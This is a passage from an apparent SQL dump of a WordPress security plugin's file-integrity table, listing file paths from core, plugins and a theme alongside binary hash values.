���Y���#�P���','',0,'?'),('HA���f�,���$F-�','wp-admin/css/customize-nav-menus-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�6쑱����C��','�\"vf:\0���`�J�����^�|cA�������','',0,'?'),('HF�x�~)U_A�vd��','wp-includes/wp-includes/css/dist/list-reusable-blocks/style-rtl.min.css',0,'�b�j��u9)�\n6�5','�b�j��u9)�\n6�5','gg(($C���(rw�H\n�O���D!\rl��a�','',0,'?'),('HGh\'�x�R���~\n','wp-admin/js/customize-nav-menus.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JD�h���?\'�\n���!','g�����*=��>\"�)�\n���ou��f��v�3','',0,'?'),('HKC�[���*GD�','wp-includes/wp-includes/js/wp-lists.js',0,'�M4���KYs:��ȫ�','�M4���KYs:��ȫ�','󩶓����Z-3w�Eї\rqK]��3�]��.X','',0,'?'),('H`�\\� �r���Y�C','wp-admin/includes/class-theme-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�ȣ�\0���O�)l+','u��S����u�����iD�p�,\\��C�M5�','',0,'?'),('Hps��pJ�$n��#d','wp-content/plugins/wp-cerber/assets/flags/am.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}56h԰��O�.��+','�i���R��ǜ=�b�1B�L��_�3��n','',0,'?'),('H|\0`B����*�Q��','wp-includes/blocks/post-navigation-link/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A�R�f��E�[','�qJ�4��^s���4|�g�*5�5̍/','',0,'?'),('H|�����\'�Y�f�','wp-includes/blocks/post-comments-form/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','쮛��9\n.ha��=8�','����b���?C�=P��\n�E�H�g�pE','',0,'?'),('H�@Q-�	�8�IŶ�','wp-content/plugins/wordfence/modules/login-security/css/login.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��\0|�\Z1��\r','�F݌\rw,�K��_�m�-��N���\"*�t��F�','',0,'?'),('H���.5 ��m�[�\\\"','wp-content/plugins/wp-cerber/assets/flags/cc.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T@e��o�e�2D�','���H�L�Ɖ�n1��)�W��;�/_nOh �','',0,'?'),('H��͇>\n{����\0{','wp-content/plugins/wordpress-seo/src/actions/semrush/semrush-phrases-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�|;b���ETd1','�&��Jũ)�_9������6�Ѳ�lA�[{/�','',0,'?'),('H�9W��=Í��DJ䱄','wp-content/plugins/wp-cerber/assets/flags/zw.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B�J\nS��4i9�\Z','u%r&XsĵIU�K3��F\"T���	���{','',0,'?'),('H��(�4�5��Q���','wp-content/plugins/wp-smushit/core/integrations/class-envira.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�\"`��/�&����','G(���3�P3*�m��toF�\Z�)�En�z�','',0,'?'),('H�@C�_Ӭ��*�S�','wp-includes/wp-includes/js/dist/format-library.js',0,'�ԯ䠦_��P^����','�ԯ䠦_��P^����','#H����X�{��M\'���%��&6�D.̺x','',0,'?'),('H��Y6o��D{�LH��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u.S��y�l�=\0C�>','�?�\\x`��Q�=���8:�v�sT��','',0,'?'),('Hý��i�Z�U,H�L','wp-admin/includes/meta-boxes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6;u|Y�\ZFX�$	��v','xZ%��؂_fKQ=]�^��ջ	Z��b���','',0,'?'),('H���C�Tp(^��l�','wp-content/plugins/wordfence/modules/login-security/classes/controller/users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':�o���\nq]\\:\\c�','<��\'@�þ���Zh��Ӏ���o�@>����','',0,'?'),('H�fM�+t���~`�i','wp-includes/wp-includes/css/media-views.css',0,'���5w�pأ����','���5w�pأ����','3ֳ���}��!p�B����A����)k�{�F�','',0,'?'),('Ie�Ù�����QeF\n','wp-content/plugins/wordpress-seo/js/dist/network-admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Njj�<�t0˷�`[�~','�O\'��G����&��5��}_���si�Ei�','',0,'?'),('I\r8p:́	ޞ}`�\Z�','wp-includes/blocks/query-pagination/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����c&��G�Qu�p','���3��?�/,([+\n��R��*2�/�$��}','',0,'?'),('IW�9�a��W��3(','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/mysql.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�™�q�W��\0�N(�','����z�4dһ�`��	\0B5��M�� ����','',0,'?'),('I0��S�$2�T�B*','wp-includes/widgets/class-wp-widget-calendar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t�#kjX�b�/�0�E','����u.�)G�F��9?4� �*2�>G\'l','',0,'?'),('I6.:\n(��i\0B��','wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)�����Z)�*j�D','�z7���cb{�9\ZJ�0ӣ�7�}�\"ϽR�[\n[�','',0,'?'),('I6U�\r7����3p�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/falsepositive.key',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h<��|�7b����','��_�^F\"��;+r&Z~ӦQ����|�5�','',0,'?'),('IN5�=)sHbd\Z���','wp-content/plugins/wordpress-seo/css/dist/yst_seo_score-1851.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�S��*#�ݱƹ��','�$V��qf #�Ӕ�&EV�/,������7�?','',0,'?'),('Ie�x�?��b�T].o','wp-includes/wp-includes/ms-load.php',0,'�),l�\"��?�V�?%','�),l�\"��?�V�?%','���#~���&�S@�]�ED}L*�#5+\r�','',0,'?'),('I�N)��p��:��<��','wp-includes/js/dist/development/react-refresh-runtime.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���:��6*\r��)�','O��GK�0(�\0X�/\nˏ��7�_���\r&0��F�','',0,'?'),('I��:Bs�#���@�','wp-blog-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_BZF1���y����)',';\Z�/\\b���t���I���͝���h��w�','',0,'?'),('I�e��Lk�F�^4A[','wp-content/plugins/wordpress-seo/src/deprecated/frontend/breadcrumbs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�,��;�&���','B��1WfNy��*�\"]���5ٖMn���','',0,'?'),('Iƒ�&{��;�-H��','wp-includes/blocks/site-logo/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']��bF�I�l�1�X��','���K�.ň,��y/���a\ny����e8�','',0,'?'),('I�Ԭ�l��v0O','wp-includes/js/dist/core-data.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wH�S}S\r�<��\n���','x�-��1;H�2c�K}^PΗ�y�_$	f��N','',0,'?'),('I�PE�Xt�FH�%�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\0��Lv�[c��)?','�C�h!݀F$�}�wd�7b(�!�p�IF.L�','',0,'?'),('I��8߽�T�\Z����0�','wp-includes/blocks/list/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�.{�:�6`�,t�ee','[��x��8AL���lz8m9(�\r�\r\0,}�N','',0,'?'),('I��_\'a��l5Pz��','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/et.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\��Am�A~��.','��ku�P;�	����z��b/\Z6jSy�','',0,'?'),('I�m=!�.������','wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-system-page-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���?<���E��Qr�','�7�xm�I�P����zay�ҁzr���s���@','',0,'?'),('I�V/��6�s��','wp-admin/js/editor-expand.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O&�\r�V��Ȃ7uW\"','��0w����^��m���ŸgC�B|G�9.��','',0,'?'),('I�a|�&�]}l?�h���','wp-includes/wp-includes/sodium_compat/src/Core/SipHash.php',0,'b�v�1^l�&)g�4��','b�v�1^l�&)g�4��','-�l����/6�\\����jx�R�\0Ю��~�','',0,'?'),('J�%.��~�—q�l�','wp-includes/class-wp-text-diff-renderer-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x����,xC��)��5-','��6��`(��͓�es�S�i#��Q�k�1��n�','',0,'?'),('J?#�͌$M�7�c�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractPlaceRecord.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�I.:���`PR�','#z��R�\ZHU���>B�nP,���\'�eT�tߺ','',0,'?'),('Jf�3?���_r�C�','wp-admin/images/w-logo-white.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n���Jvۢ~�y�\\�','n��D��� _�;�!G�םcV�0M9i�=�','',0,'?'),('J��E[�7U��\Z�~','wp-includes/js/plupload/handlers.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','曹1f�q#a�S ��Q�','�!wכ���w�Qs��EN�����r�ㆾXki','',0,'?'),('JyQl��D�!�HV�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-bot-protection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A���B!Q]�ܤ�','��A��w��{`�)�R	#�}����c','',0,'?'),('Jw��6�ԑ�`�e','wp-content/themes/twentytwentythree/patterns/post-meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C��q\0���v���','MBt=T&��p�8�~&Hp�hS�X.�t�l��VS','',0,'?'),('J.��Ǝ=U˹!\\X','wp-content/plugins/wordpress-seo/src/presenters/open-graph/type-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5ϴ�h�Utو��','��N2���t��T@�᭼�o���E�Xe]�&��h','',0,'?'),('J0N����q\'�t�o#','wp-content/plugins/wordpress-seo/src/integrations/watchers/addon-update-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<X�Z��P�e:�4','n��-�.�#��H�Ыb��V1#��ǩƎ ��L','',0,'?'),('J8�E��Dh+���F','wp-admin/js/site-health.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��g:�OZ��O`\r<�','M>�a�ShK�Q�����I���95��eq�QK�','',0,'?'),('J?�[�IS����{�6G','wp-content/plugins/wp-cerber/assets/flags/bb.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����f�,t?�Ӭe�v','�5W�̪1�s�ϺP/C2D���~�(4\0Cf;�9','',0,'?'),('JR�c�T�5$h�M','wp-content/plugins/wordpress-seo/js/dist/dynamic-blocks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���%缋�W�z|�d�','L���]��D��d��iH�K��⒛','',0,'?'),('J\\����P��S���','wp-content/plugins/wp-cerber/assets/flags/gw.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0��szŴjA��Ȍ','k�Nz���Hι\0����E1*�|&���8�t�','',0,'?'),('Jj�\0pmw�㚉b(','wp-includes/blocks/code/theme-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�	m�����E�J��','�w(�$���썎�B.���}�e�-���','',0,'?'),('Jl���1������','wp-content/plugins/wordfence/models/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E\"xK��{�8�dS�','C����\'r�9��@�K�ކt�����w#@k�','',0,'?'),('Jv�D��m�_��|�','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3\ZF�f���t�˧','��vr�J�EƻN��x�i���f�|.^1%^nW','',0,'?'),('J{�ֹZi^ùx�I','wp-admin/media-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�J�}�ZOc�h��',':�3&̓Q�M\n��!�1P� ���ee�','',0,'?'),('J��	+D��y*ߪޙ','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/tk.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t� 5)�L�Е2�~�','���\0�1�&����!>����i����>V�h���','',0,'?'),('J����o��=F�','wp-content/plugins/wp-smushit/app/views/dashboard/integrations-meta-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2��{�ۣ<�?�','=}E�o�i�m�/���~y�F{���⑹�p�}&��','',0,'?'),('J��Mu���\Z	Z�f9m','wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php',0,'}+#z,��e�rEJ-','}+#z,��e�rEJ-','sf��q@��8�!yW�&ڔA�+/�uY���44�G','',0,'?'),('J�����v3)qyS�z�8','wp-content/themes/hitmag/inc/kirki/modules/icons/icons.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����`X�7��Mi�','�A��B}��_@��d�T�&��F�˥','',0,'?'),('J�>����\"��/','wp-includes/Requests/Auth.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+����y-uP�5�M9н','k����w�6XN\r�����0�c����Ֆ�','',0,'?'),('J���;<��C{߫��N�','wp-includes/blocks/spacer/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','л�B�����>e���X','-ӡ�n�ڲ�y�qqx-j���!p�B٠)XT4VN[','',0,'?'),('J�E�E���>�2v��K','wp-content/plugins/wordpress-seo/lib/model.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\n�a�إ}@c�+','\nɝlt͆�P˓�����ɸ-/��?s��8j','',0,'?'),('J�%A�nN��O�[̨�','wp-content/plugins/wordpress-seo/src/deprecated/admin/recalculate/class-recalculate-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#i&�1�a������','M��*˃�ؙ��1�\n,$}���nJ1~=','',0,'?'),('Jլ4��\r�n���','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777620_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�\\c7�y�x�гl','�~��qV����*\'�1�����]3�^�����m','',0,'?'),('J���!�+rW�yz��','wp-content/plugins/wp-fastest-cache/js/lang/ro.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U�k�O��\n�m;�','f�fkDS1IB:��L�6JF�x�`sC|�>m��','',0,'?'),('J򾁬��Oh��sDؾ','wp-includes/js/zxcvbn.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|	���#PV	/{�M�_','v�XI�9��n�1e�6��C�\\�.p+�\"��K�','',0,'?'),('K��~�a�O�2R','wp-content/plugins/wp-smushit/app/views/directory/meta-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w��b���$�ѵ>�','`n�oE3��p���\0��,�}���Vs��','',0,'?'),('K}^ M��	�\0�I','wp-content/plugins/wp-smushit/core/external/plugin-notice/assets/fonts/wpmudev-close-icon.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L?���\n�p0wD���','Um���+^��ob�*��>�٨=�������','',0,'?'),('K���ߺ�b�','wp-content/plugins/wordfence/lib/compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>���z�x��C�}','�Nܓ�#d�t�B!\"M՞�==�@o��','',0,'?'),('K0���\r��ܐcn�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�29Y¿,E#�/����','� � ��h<)s��>-P��{���K���I�\0��','',0,'?'),('K9\Z�F�Qȸ\r$^&p��','wp-content/plugins/wp-cerber/languages/wp-cerber-uk.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o��q�A�~P��	','*qn>�4����&�og�e��eʓ��˹^�5��','',0,'?'),('K>�^[�P�F�1�h:','wp-includes/blocks/social-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-���MM����5','��a+�Fy/�VdgM5��n�O��Z=��^����','',0,'?'),('KKOf�Sd�iB0Ov��','wp-content/plugins/wordfence/views/scanner/scanner-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2����v���t�','��9���`N�>ɞ�9:��A���\0��L����','',0,'?'),('KR��&�J\"_}�3c?�','wp-includes/wp-includes/images/wpspin.gif',0,'hk�u�R�\r@9k���','hk�u�R�\r@9k���','���!�Fױ����(���#��1��:�','',0,'?'),('KZ��Ѽ��˷��m','wp-content/plugins/wordpress-seo/vendor/composer/platform_check.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9�p;�7�i�0�lA�','�?P���_��\"�E4�O�I���x�\"���','',0,'?'),('K]��I23�d�$�\n�Ģ','wp-content/plugins/wp-fastest-cache/uninstall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=�@w�,%�\\,��','XW�޹C,$���ϋ퀮WH���F����>��','',0,'?'),('KbF�W\0,#y�M�U�!','wp-content/plugins/wordpress-seo/css/dist/dashboard-1851.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Vv]��5ͧy��','>j�9�\0�}����:�T�=2�g\Z�;$','',0,'?'),('Kj\\\"�p�隍Ӥu���','wp-includes/wp-includes/random_compat/cast_to_int.php',0,'�!�>����=I���O','�!�>����=I���O','p>2���x���tn�tq��������b','',0,'?'),('K|�_�dҪ��p�T�','wp-includes/wp-includes/js/tinymce/plugins/charmap/plugin.min.js',0,'=B�쟄��P\rL��','=B�쟄��P\rL��','•�x[�G��-�90b.z�G��az�>�r','',0,'?'),('K�nҋD&sR�WU(�','wp-admin/css/farbtastic.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�^�:�G�(���:k\n','4��7V�f�� �/��������D��W3p','',0,'?'),('K�����կ̺�tл�','wp-includes/wp-includes/js/codemirror/codemirror.min.css',0,'�23j���1��(D��','�23j���1��(D��','��Ό�,a�u��@�s�Y%K���-o��n\r�','',0,'?'),('K���+��)[�NC���','wp-includes/wp-includes/js/json2.js',0,'s��{N�|EO�0�','s��{N�|EO�0�','q3�..�j G\\R�nݼI/T��-�','',0,'?'),('K���R	wA���e','wp-includes/blocks/latest-posts/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M_�P~{��*���o�','����Y�F\\����J���v���N�ѯN��','',0,'?'),('K�c��#2s�/(�\"�','wp-includes/widgets/class-wp-widget-pages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\���!$��:_:G','�*��\"#倮��U�8���c��*[��j\'','',0,'?'),('K��<�H<7�E�,l��','wp-content/plugins/wordfence/views/waf/options-group-brute-force.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�p�k�<���#Y','Qx�b���nbWK����E*�l�o��ޅ��ʛ��','',0,'?'),('K����\r\\Uz��\Z:\'','wp-includes/sodium_compat/namespaced/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�*��F谯��<��l','�®�R�l�U�����wz�ank��G�t�3�','',0,'?'),('K��]C��l7:�D\0','wp-admin/js/widgets/media-audio-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P IM�;p8vn��[�S','����9j��lxB�eH:�y�%}�c	TP�_�','',0,'?'),('K�.�6���<F��R','wp-includes/wp-includes/js/mediaelement/mediaelement.min.js',0,'-6�������m����','-6�������m����','���%�]�cط�Z���7�\n�ԋ���2���','',0,'?'),('KƽP��\\`�M��r��','wp-content/plugins/wp-smushit/app/assets/images/smush-promo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�d���	�ܹ\0�','%���S���F�^3E��n�3,���cl��','',0,'?'),('K�Lx<C���H��e\Z','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�EN�Ăۛ(\n�n','����Ѭ}^�EF����>��ڂB��','',0,'?'),('K��o��2x2o','wp-content/plugins/wordpress-seo/src/actions/indexing/indexing-complete-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Yo*!2<�OC�2�¤`2','�|��.�ԍ�g?�y��;����?���+9��s','',0,'?'),('K�7b{�r�u&�M�XD','wp-includes/css/dist/block-library/editor-elements-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z���tf/V�>t','�o��T���Q��bj�m�cw��\"�;J�$�\n�x�','',0,'?'),('K�ϥ�%:�{�Rj���X','wp-content/plugins/wordpress-seo/src/generators/schema/author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������ia���aB','l\Z���*�xz\Z��&^&�A�_cŖo�YU��S.','',0,'?'),('K� ���*�;ܼ�nc','wp-includes/blocks/calendar/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\n\\Gfi�TS(ђ','{��)D�ʆ��?�У\'1J�e��Y`���','',0,'?'),('K��W�&\0\0K�\06�G�','wp-admin/js/set-post-thumbnail.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':1N�(�xl�X��\'','v9�\n{lK��~q�#�>��ߦ��� J�`~','',0,'?'),('K�K+�2�	aeZ�e','wp-includes/class-walker-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g�{[=�N��k�t','j\rv\rY�\'�5g�Ԡ�6:���0�\"�0��ٮ7','',0,'?'),('L�j���YH?2���','wp-content/plugins/wp-smushit/core/external/plugin-notice/assets/fonts/wpmudev-close-icon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Dֳ��z�\Z(��M�','�\r��K� RJB�v�.��k@�0�(&�?u','',0,'?'),('L\n³e��2��4lp','wp-content/themes/hitmag/template-parts/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�SS�犐�\'2�)Τ',')~b꫊U���\'��Hb%�M@�^ ��\0����','',0,'?'),('L�w*�ҚF���T�','wp-content/plugins/wordpress-seo/src/conditionals/wincher-automatically-track-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#�$��a���H��','�QE-�R���K/��S-�!VΈf-�Ȑp�.�]','',0,'?'),('LRTU��n?bΌ�','wp-includes/wp-includes/js/tinymce/plugins/wordpress/plugin.min.js',0,'f\\�DŽH�$�M(�l�','f\\�DŽH�$�M(�l�','@��3�\nQz�p��\n�j;Q��w��k���13�<','',0,'?'),('L��5C�Z��z�','wp-content/plugins/wordpress-seo/src/builders/primary-term-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�؅�h�΀�L�t�K�','�X�s�LWD,5���|��Wyx����$ZT{ W','',0,'?'),('L;6w���/�^5�','wp-includes/wp-includes/customize/class-wp-customize-nav-menu-setting.php',0,'��,�#Y�bu3�����','��,�#Y�bu3�����','�Ӻ�f����\r���o!�cY	�o��\r����','',0,'?'),('L<#���\Z����}','wp-includes/js/tinymce/skins/lightgray/img/loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9K���M�:�Tf�9','��;���T��O`(6��,�sk�Z���c�R��+','',0,'?'),('L#��/۰*�3���\r','wp-admin/includes/class-wp-terms-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O����1�̴�5���','�*�W]1�,;N� y��{V�a�U����{��','',0,'?'),('L(��n�9[2�C6�','wp-includes/js/zxcvbn-async.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��E��\nO\\��Y�b','��\'FP�\Z�/G\n��J����\\B��\Z��IT�','',0,'?'),('L9P�X{���{�E���','wp-content/plugins/wordpress-seo/admin/google_search_console/views/gsc-redirect-nopremium.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�cyZ����','����\ZY��ܿ���y]8��(Q��l','',0,'?'),('LC�g=��7���Ϸ��','wp-content/plugins/redirection/models/match.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5a�f�rl�P��. ��(','�0\0PX^��1���lU!s����k�0�)o� ��','',0,'?'),('LIz���$�R`�+','wp-includes/wp-includes/js/tinymce/skins/lightgray/img/loader.gif',0,'9K���M�:�Tf�9','9K���M�:�Tf�9','��;���T��O`(6��,�sk�Z���c�R��+','',0,'?'),('LI�g0	蚜�n�Ha\r','wp-content/plugins/wp-fastest-cache/images/tinymce-wpfcnot.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','쉝�J僶@3	�}','��� �fS׷��$P�Y~&6�w���)^��c�','',0,'?'),('LR7Q��ToG|�{','wp-content/plugins/wordfence/lib/viewFullActivityLog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#\\��F\r�v�C�','�X�74���u\rt{��Mlׄ��qT}���','',0,'?'),('L`ڭ�V����w�w�E','wp-content/plugins/wp-smushit/app/assets/css/smush-admin.min.css.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1���m]g��|O)I','\r<��7}m�˦�\'x��桹\r!��s���i��','',0,'?'),('Lap���8g�V�,��g�','wp-includes/js/dist/vendor/react-dom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W��6��9�y4Bo','�H�\r(?����\Z�Rj䮹^��XXħ��K','',0,'?'),('Lb����HL�l**','wp-content/themes/hitmag/inc/kirki/modules/css-vars/script.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�N��rL�ʹ�K�','�2�0N�@���T\"8C���Q�:g��4�?�-�','',0,'?'),('LsЇś\n�c}>�K��','wp-includes/css/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�~.�(�S��>0','B�9��E6/*qopt��9�e�e�@�\'ܮ�','',0,'?'),('Lz����Z��#�<','wp-includes/class-wp-locale-switcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u</��u^�+��','�wR+&XUFl��Nh8��v�JΉO�&�t���f','',0,'?'),('LzEk�R�BU�)Z\n�b','wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/ParameterBag/ParameterBag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r��_U��T��F(�','��h��)�xD�40�l]��M��tL�%�:\r�r','',0,'?'),('L�����t@m*V�|��\0','wp-includes/wp-includes/js/jquery/ui/accordion.js',0,'������Z����a��','������Z����a��','�\"����!f�~xXW��ۜ��4�Ȗ$:��2/','',0,'?'),('L��ջ˻vMlW��d�','wp-includes/blocks/pullquote/theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']o���a��!\'�','OJg�I}Ol\n4?k�a���W�K�!o��Q���','',0,'?'),('L�)P))֗�nS�|�','wp-includes/wp-includes/class-wp-error.php',0,'�l� &�0?&�c~��','�l� &�0?&�c~��','G�bM[G&Jr�F�E����1�r�s�L,t�(�W','',0,'?'),('L��S�h��y����;�','wp-includes/wp-includes/js/customize-base.min.js',0,'�$��r�#��j	�','�$��r�#��j	�','LF�#�53��uu��t�F	�չRk*xs_{E','',0,'?'),('L���\\���\0\0����\0','wp-includes/wp-includes/robots-template.php',0,'�\\��líܓM��','�\\��líܓM��','^�h��R߻u�ɆCZ11��S���&̊p0','',0,'?'),('L�[��)ڢ��z�.','wp-content/plugins/wordpress-seo/js/dist/languages/ca.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^IR����:\n>b�oN','��A�OAs��7*�`�C�w\"��u��Z#�c','',0,'?'),('L��r1�墼�k�|�G','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/integrations/wincher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';;�h%	���$p�Y�','vh_�(	3����:hl�^[��5K�౺','',0,'?'),('L��e�t\"pc(	